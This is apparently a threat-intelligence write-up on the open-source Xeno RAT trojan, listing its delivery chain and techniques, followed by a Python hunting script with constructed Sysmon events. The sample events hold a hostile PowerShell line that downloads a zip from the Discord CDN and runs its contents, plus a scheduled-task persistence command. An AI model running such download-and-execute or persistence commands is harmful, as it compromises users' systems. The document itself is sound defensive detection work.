Open-Source Xeno RAT Trojan Emerges as a Potent Threat on GitHub

An “intricately designed” remote access trojan (RAT) called Xeno RAT has been published on GitHub, making it freely available to other threat actors. Written in C# and compatible with Windows 10 and Windows 11, the open-source RAT comes with a “comprehensive set of features for remote system management,” according to its developer, who goes by the name moom825.

The Hacker News

Xeno RAT Trojan

KEY FINDINGS

  • Xeno RAT has the functionality and characteristics of advanced malware.
  • The malware’s developer chose to maintain it as an open-source project and made it accessible via GitHub.
  • A threat actor customized its settings and distributed it via the Discord CDN.
  • The primary infection vector is a Windows shortcut file disguised as a WhatsApp screenshot, which acts as a downloader.
  • The downloader fetches a zip archive from the Discord CDN, extracts it, and executes the next-stage payload.
  • A multi-step process is used to produce the final payload.
  • Before executing the final stage, it checks for debuggers, monitoring tools, and analysis tools.
  • It uses anti-debugging techniques and operates stealthily.
  • The malware adds itself as a scheduled task for persistence.
  • It abuses the Windows DLL search order (DLL search-order hijacking) so that a trusted executable loads the malicious DLL.
  • It injects malicious code into a legitimate Windows process (process injection).
  • It continuously monitors the compromised system.
  • It employs extensive obfuscation of files and code to evade detection.
  • It uses obfuscated network traffic to receive instructions and updates.
  • It sends status updates to the C2 server and receives instructions at regular intervals.
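As an added example (not code from the report or from the Xeno RAT project), the following Python script turns three of the findings above into hunting rules and runs them over constructed process-creation events that use Sysmon Event ID 1 field names: a shell launched from explorer.exe (how a double-clicked shortcut runs) whose command line fetches from the Discord CDN, a scheduled task whose action points into a user-writable directory, and a Microsoft-authored binary executing from a user-writable directory (the setup that DLL search-order hijacking needs). The event values, paths, file names and the task name are assumptions made for the illustration, not observed indicators.

```python
import re

# Constructed sample events (Sysmon Event ID 1 field names, reduced to the fields the
# rules use). Every value is made up to illustrate the delivery chain; none is captured
# telemetry or a known indicator.
SAMPLE_EVENTS = [
    {   # a double-clicked shortcut runs under explorer.exe; its target pulls a zip from the Discord CDN
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "Company": "Microsoft Corporation",
        "CommandLine": r'powershell.exe -w hidden -c "iwr https://cdn.discordapp.com/attachments/111/222/IMG-20240101-WA0001.zip -OutFile $env:TEMP\s.zip; Expand-Archive $env:TEMP\s.zip $env:TEMP\s; & $env:TEMP\s\run.exe"',
    },
    {   # persistence: a scheduled task whose action lives under the user's profile
        "Image": r"C:\Windows\System32\schtasks.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "Company": "Microsoft Corporation",
        "CommandLine": r'schtasks.exe /create /sc minute /mo 5 /tn "Updater" /tr "C:\Users\alice\AppData\Roaming\Updater\host.exe" /f',
    },
    {   # side-loading setup: a Microsoft-authored binary (placeholder name host.exe) copied into a user-writable folder
        "Image": r"C:\Users\alice\AppData\Roaming\Updater\host.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "Company": "Microsoft Corporation",
        "CommandLine": r"C:\Users\alice\AppData\Roaming\Updater\host.exe",
    },
    {   # benign: a service host started from System32
        "Image": r"C:\Windows\System32\svchost.exe",
        "ParentImage": r"C:\Windows\System32\services.exe",
        "Company": "Microsoft Corporation",
        "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs",
    },
    {   # benign: a scheduled task whose action lives under Program Files
        "Image": r"C:\Windows\System32\schtasks.exe",
        "ParentImage": r"C:\Program Files\Vendor\setup.exe",
        "Company": "Microsoft Corporation",
        "CommandLine": r'schtasks.exe /create /sc daily /tn "VendorUpdate" /tr "C:\Program Files\Vendor\update.exe"',
    },
]

# Directories an unprivileged user can write to; a payload dropped by a downloader or a
# task action pointing here is far more suspicious than one under System32 or Program Files.
USER_WRITABLE = re.compile(
    r"\\(?:Users\\[^\\]+\\(?:AppData|Downloads|Desktop|Documents)|Users\\Public|ProgramData|Windows\\Temp)\\",
    re.IGNORECASE,
)
DISCORD_CDN = re.compile(
    r"https?://(?:cdn\.discordapp\.com|media\.discordapp\.net)/attachments/", re.IGNORECASE
)
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def basename(path):
    """Lower-cased final path component, tolerant of either separator."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def rule_discord_downloader(ev):
    """Shell spawned by explorer.exe (a double-clicked shortcut) fetching from the Discord CDN."""
    return (
        basename(ev["ParentImage"]) == "explorer.exe"
        and basename(ev["Image"]) in SHELLS
        and DISCORD_CDN.search(ev["CommandLine"]) is not None
    )


def rule_schtasks_user_writable(ev):
    """schtasks /create whose command line references a user-writable action path."""
    cl = ev["CommandLine"]
    return (
        basename(ev["Image"]) == "schtasks.exe"
        and re.search(r"/create\b", cl, re.IGNORECASE) is not None
        and USER_WRITABLE.search(cl) is not None
    )


def rule_microsoft_binary_user_writable(ev):
    """Microsoft-authored executable running from a user-writable directory: the trusted host
    a DLL search-order hijack needs, copied beside the attacker's DLL. Heuristic only."""
    return ev.get("Company", "") == "Microsoft Corporation" and USER_WRITABLE.search(ev["Image"]) is not None


RULES = [
    ("discord_cdn_downloader", rule_discord_downloader),
    ("schtasks_user_writable_action", rule_schtasks_user_writable),
    ("microsoft_binary_in_user_writable_dir", rule_microsoft_binary_user_writable),
]


def evaluate(ev):
    """Names of every rule the event matches."""
    return [name for name, fn in RULES if fn(ev)]


def hunt(events):
    """(index, matched rule names) for each event that matches at least one rule."""
    hits = []
    for i, ev in enumerate(events):
        matched = evaluate(ev)
        if matched:
            hits.append((i, matched))
    return hits


if __name__ == "__main__":
    for i, matched in hunt(SAMPLE_EVENTS):
        print(i, SAMPLE_EVENTS[i]["Image"], matched)
```

These rules cover the delivery and persistence steps that leave process-creation evidence; the anti-analysis checks, the process injection into a legitimate Windows process, and the obfuscated C2 traffic in the findings need other telemetry (image-load, remote-thread and network events) and are not detected here. Expect the user-writable-path heuristics to need tuning for legitimate per-user installers and updaters.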